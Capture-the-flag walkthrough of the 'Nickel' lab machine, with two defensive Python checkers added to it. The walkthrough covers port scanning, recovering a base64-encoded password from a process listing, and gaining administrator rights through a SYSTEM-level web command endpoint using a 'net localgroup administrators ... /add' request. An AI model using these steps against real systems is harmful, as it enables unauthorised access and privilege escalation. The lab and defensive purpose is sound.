# Nickel

## Gaining Access

Nmap scan:

```
$ nmap -p- --min-rate 4000 192.168.240.99
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-07 14:39 +08
Nmap scan report for 192.168.240.99
Host is up (0.17s latency).
Not shown: 65518 closed tcp ports (conn-refused)
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
5040/tcp  open  unknown
7680/tcp  open  pando-pub
8089/tcp  open  unknown
33333/tcp open  dgi-serv
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
```

FTP doesn't accept anonymous logins and RDP is open for this machine.

### Web Enumeration -> User Creds

Port 80 was weird:

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-4b1b5673a08f0bfc4ff958919228001e942e4923%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

Port 8089 was slightly weirder:

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-e7a846b75dfb5e0e7154be285849588ba9dc2a03%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

Clicking on any of these would send requests to an IP address on port 33333:

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-afffaa08e004a07026f8ea051e6d6f7bbf9238f2%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

Meanwhile, port 33333 wanted a token of some sort:

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-38c302bad5811dbdfa9f5b1ccc919fd05fc19ec9%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

And this is all the information we have. I experimented with sending POST requests instead of GET requests, and it actually returned something from port 33333.

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-43dc7996795380d844fa5d6fab2e77c8108d4ce6%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

This was different from the Not Found errors. I changed around the directory it sent requests to, and the `list-running-procs` endpoint returned something interesting:

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-fbb8cce4dd09206aeebfdf9402a6ad7a7b5dfa84%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

If we scroll down, we can see this:

```
name        : cmd.exe
commandline : cmd.exe C:\windows\system32\DevTasks.exe --deploy C:\work\dev.yaml --user ariah -p
              "Tm93aXNlU2xvb3BUaGVvcnkxMzkK" --server nickel-dev --protocol ssh
```

The value passed to `-p` is base64, and it decodes to a plaintext password:

```
$ echo 'Tm93aXNlU2xvb3BUaGVvcnkxMzkK' | base64 -d
NowiseSloopTheory139
```

This was the password for the user `ariah`, and it works:

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-fa970fd0dfbfd4cbaef273f058ab49cb7fa0ab10%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>
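A defensive counterpart to the finding above, written for this page and not part of the original writeup: a small Python checker that walks a process listing in the `name : ... / commandline : ...` layout shown, flags password-style flags, and decodes base64 values, so a secret passed on a command line (as `DevTasks.exe -p` is here) surfaces in an audit. The `PASSWORD_FLAGS` set and the extra `svchost.exe` entry in the sample are assumptions.

```python
import base64
import re

# Constructed sample in the shape of the listing above: the cmd.exe entry is the page's
# own; the svchost.exe entry is added to exercise a bare "-p" that carries no value.
SAMPLE_PROCS = """\
name        : svchost.exe
commandline : C:\\Windows\\system32\\svchost.exe -k netsvcs -p

name        : cmd.exe
commandline : cmd.exe C:\\windows\\system32\\DevTasks.exe --deploy C:\\work\\dev.yaml --user ariah -p
              "Tm93aXNlU2xvb3BUaGVvcnkxMzkK" --server nickel-dev --protocol ssh
"""

PASSWORD_FLAGS = {"-p", "-pw", "--pass", "--password"}  # assumed flag list


def parse_process_list(text):
    """Parse 'key : value' records; indented lines continue the previous value."""
    records, current, last_key = [], {}, None
    for line in text.splitlines() + [""]:  # trailing "" flushes the last record
        if not line.strip():
            if current:
                records.append(current)
            current, last_key = {}, None
        elif line[0].isspace() and last_key:
            current[last_key] += " " + line.strip()
        else:
            key, _, value = line.partition(":")
            last_key = key.strip()
            current[last_key] = value.strip()
    return records


def try_base64(value):
    """Decode value as base64 if it yields printable ASCII text, else return None."""
    try:
        text = base64.b64decode(value, validate=True).decode("ascii").strip()
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None
    return text if text and text.isprintable() else None


def find_cli_secrets(text):
    """Report password-style flags that carry a value, decoding base64 where possible."""
    findings = []
    for rec in parse_process_list(text):
        tokens = [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', rec.get("commandline", ""))]
        for i, tok in enumerate(tokens[:-1]):  # a trailing flag has no value to leak
            if tok.lower() in PASSWORD_FLAGS:
                findings.append({"process": rec.get("name"), "flag": tok,
                                 "value": tokens[i + 1], "decoded": try_base64(tokens[i + 1])})
    return findings
```

Run over live data by feeding it the output of `Get-Process | Format-List Name, CommandLine` or the equivalent WMI query; the same continuation rule applies.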

## Privilege Escalation

### FTP PDF -> Admin Shell

There was a `C:\ftp` directory that looked interesting:

```
 Directory of C:\ftp

09/01/2020  12:38 PM    <DIR>          .
09/01/2020  12:38 PM    <DIR>          ..
09/01/2020  11:02 AM            46,235 Infrastructure.pdf
```

We can transfer this back to our machine via `smbserver.py` and then view it.

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-1d13bdc602452363f0e0d2f1793ec841357a9446%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

There was a temporary command endpoint, and I enumerated it from the machine:

```
ariah@NICKEL C:\ftp>curl http://nickel/?whoami
<!doctype html><html><body>dev-api started at 2023-02-17T09:16:22

        <pre>nt authority\system
</pre>
</body></html>
```

This command endpoint runs as SYSTEM, so we can simply add `ariah` to the Administrators group.

```
ariah@NICKEL C:\ftp>curl http://nickel/?net%20localgroup%20administrators%20ariah%20/add
<!doctype html><html><body>dev-api started at 2023-02-17T09:16:22

        <pre>The command completed successfully.

</pre>
</body></html>

ariah@NICKEL C:\ftp>net user ariah
User name                    ariah
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            9/1/2020 12:38:26 PM
Password expires             Never
Password changeable          9/1/2020 12:38:26 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   7/6/2023 11:56:18 PM

Logon hours allowed          All

Local Group Memberships      *Administrators       *Users
Global Group memberships     *None
The command completed successfully.
```
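As an added defensive check (not from the original writeup): parse `net user` output in the layout shown above and report an account that holds `Administrators` membership outside a baseline, which is how the group change made through the dev-api would surface in a local-admin audit. The `ADMIN_BASELINE` set is a hypothetical allowlist; the sample keeps only the fields the check needs.

```python
import re

# Constructed sample: the shape of the `net user ariah` output above, trimmed to the
# fields the check needs (the full output carries more lines, parsed the same way).
NET_USER_OUTPUT = """\
User name                    ariah
Full Name
Comment
Account active               Yes
Account expires              Never

Local Group Memberships      *Administrators       *Users
Global Group memberships     *None
The command completed successfully.
"""

# Hypothetical baseline for this host: accounts allowed to be local administrators.
ADMIN_BASELINE = {"Administrator"}


def parse_net_user(text):
    """Turn `net user <name>` output into a dict; membership fields become lists."""
    fields = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("The command completed"):
            continue
        parts = re.split(r"\s{2,}", line.rstrip(), maxsplit=1)  # label / value columns
        label = parts[0]
        value = parts[1] if len(parts) > 1 else ""
        if label.lower().endswith("memberships"):
            # groups are laid out as "*Group1       *Group2"; "*None" means no groups
            groups = [g.strip() for g in value.split("*") if g.strip()]
            fields[label] = [g for g in groups if g != "None"]
        else:
            fields[label] = value
    return fields


def unexpected_local_admin(text, baseline=ADMIN_BASELINE):
    """Return the account name if it is in Administrators but not in the baseline."""
    fields = parse_net_user(text)
    user = fields.get("User name", "")
    if "Administrators" in fields.get("Local Group Memberships", []) and user not in baseline:
        return user
    return None


if __name__ == "__main__":
    print(unexpected_local_admin(NET_USER_OUTPUT))
```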

Then we can log in again and view the flag:

<figure><img src="https://1617468840-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fqpzdj1tPRpELJdvxuVYh%2Fuploads%2Fgit-blob-45aa5947cae6e317e54f007f70c83f96fe9b539a%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>

Rooted!
